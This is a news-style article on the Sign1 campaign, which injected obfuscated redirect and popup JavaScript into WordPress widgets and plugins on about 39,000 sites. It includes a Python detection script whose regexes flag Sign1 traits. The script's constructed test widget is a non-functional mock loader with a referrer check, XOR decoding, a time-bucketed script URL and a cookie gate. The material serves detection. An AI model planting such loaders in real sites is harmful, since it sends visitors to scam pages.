
Sign1 Malware

A previously unknown malware operation named Sign1 has infiltrated more than 39,000 websites within six months, bombarding visitors with unwanted redirects and popup advertisements. The operators implant the malware into custom HTML widgets and legitimate plugins on WordPress sites. Rather than altering the genuine WordPress files, they inject the Sign1 scripts into these locations and let them carry out the malicious activity.

The Sign1 Malware Campaign Has Compromised Nearly 40,000 Sites

Drawing on past WordPress breaches, researchers believe that the Sign1 Malware infection most likely relies on a dual strategy of brute-force attacks and the exploitation of plugin vulnerabilities to get past website defenses. Once inside, the attackers commonly use WordPress custom HTML widgets or install the otherwise legitimate Simple Custom CSS and JS plugin to embed the malicious JavaScript code.

Examination of Sign1 has revealed that it uses time-based randomization to generate dynamic URLs that change every 10 minutes in order to thwart detection. The domains are registered shortly before they are used in attacks, so they are absent from blocklists. These URLs serve to fetch additional malicious scripts that are executed in visitors' browsers.

Initially hosted on Namecheap, the attackers later migrated their operations to HETZNER for hosting and placed Cloudflare in front of it to conceal the servers' IP addresses.

The Sign1 Malware Takes Victims to Dubious and Unsafe Sites

The Sign1 Malware injects code that uses XOR encoding and seemingly random variable names, which complicates detection by security tools.

Before activating, the malicious code checks for specific referrers and cookies: it primarily targets visitors arriving from prominent platforms such as Google, Facebook, Yahoo and Instagram, and otherwise remains dormant. The code also sets a cookie in the visitor's browser so that the popup appears only once per visitor, which reduces the likelihood that the compromised website's owner receives reports about it.

The script then redirects visitors to fraudulent sites, such as counterfeit captcha pages, designed to trick users into enabling browser notifications. Those notifications subsequently flood the operating system desktop with unwanted advertisements.
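The behaviours described above (a referrer check for the named platforms, a once-per-visitor cookie gate, XOR decoding of an obfuscated string, and a loader URL bucketed by the current time) can be turned into a heuristic scan of widget contents. The following Python script is an added example, not the researchers' detection logic; its regexes are assumptions about how such code commonly looks rather than signatures taken from real Sign1 samples, and the two widget bodies are constructed stand-ins for rows pulled from a WordPress custom HTML widget.

```python
import re

# Heuristic traits mirroring the Sign1 behaviours described in the text.
# The patterns are this example's own assumptions, not real Sign1 signatures.
TRAITS = {
    "referrer_check": re.compile(r"document\.referrer"),
    "platform_names": re.compile(r"google|facebook|yahoo|instagram", re.I),
    "cookie_gate": re.compile(r"document\.cookie"),
    "xor_decode": re.compile(r"charCodeAt\s*\([^)]*\)\s*\^"),
    "time_bucketed_url": re.compile(r"(Date\.now\(\)|\.getTime\(\))\s*/\s*\d{3,}"),
    "script_loader": re.compile(r"createElement\s*\(\s*['\"]script['\"]"),
}
SCRIPT_TAG = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

def find_traits(js: str) -> set[str]:
    """Names of the Sign1-style traits present in one inline script body."""
    return {name for name, rx in TRAITS.items() if rx.search(js)}

def scan_widget(html: str, threshold: int = 4) -> list[tuple[int, set[str]]]:
    """Return (script index, traits) for each inline script that meets the threshold.
    A single trait (e.g. a consent cookie) is normal; several together are not."""
    flagged = []
    for idx, body in enumerate(SCRIPT_TAG.findall(html)):
        traits = find_traits(body)
        if len(traits) >= threshold:
            flagged.append((idx, traits))
    return flagged

# Constructed widget contents; neither is a real Sign1 sample.
BENIGN_WIDGET = """<div>Contact us</div>
<script>document.cookie = "consent=1; path=/";</script>"""

SUSPECT_WIDGET = """<script>
var a1f9 = "constructed-placeholder";  // stands in for an XOR-encoded string
if (/google|facebook|yahoo|instagram/i.test(document.referrer)
    && document.cookie.indexOf("v=") < 0) {
  var o = "", k = 0x7f;
  for (var i = 0; i < a1f9.length; i++) o += String.fromCharCode(a1f9.charCodeAt(i) ^ k);
  var s = document.createElement("script");
  s.src = o + Math.floor(Date.now() / 600000) + ".js";  // 10-minute bucket
  document.head.appendChild(s);
  document.cookie = "v=1";
}
</script>"""

if __name__ == "__main__":
    for label, html in (("benign", BENIGN_WIDGET), ("suspect", SUSPECT_WIDGET)):
        print(label, scan_widget(html))
```

In practice the widget bodies would come from the site's database (the stored widget and plugin snippets) rather than from constants, and the threshold should be tuned so that legitimate consent or analytics snippets are not flagged.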

Experts note that Sign1 has evolved noticeably over the six documented months of the campaign, with infections peaking each time a new version of the malware is released.

The Sign1 Malware Has Become More Difficult to Stop

The Sign1 Malware has been detected on over 39,000 websites, and the latest attack wave, underway since January 2024, has claimed 2,500 sites. The campaign has grown stealthier and more resilient to blocking over time, which is a worrying development.

To protect their sites against these attack campaigns, companies are advised to use a strong, long administrator password and to update their plugins to the latest version. Unnecessary add-ons should also be removed, since each one adds to the potential attack surface.
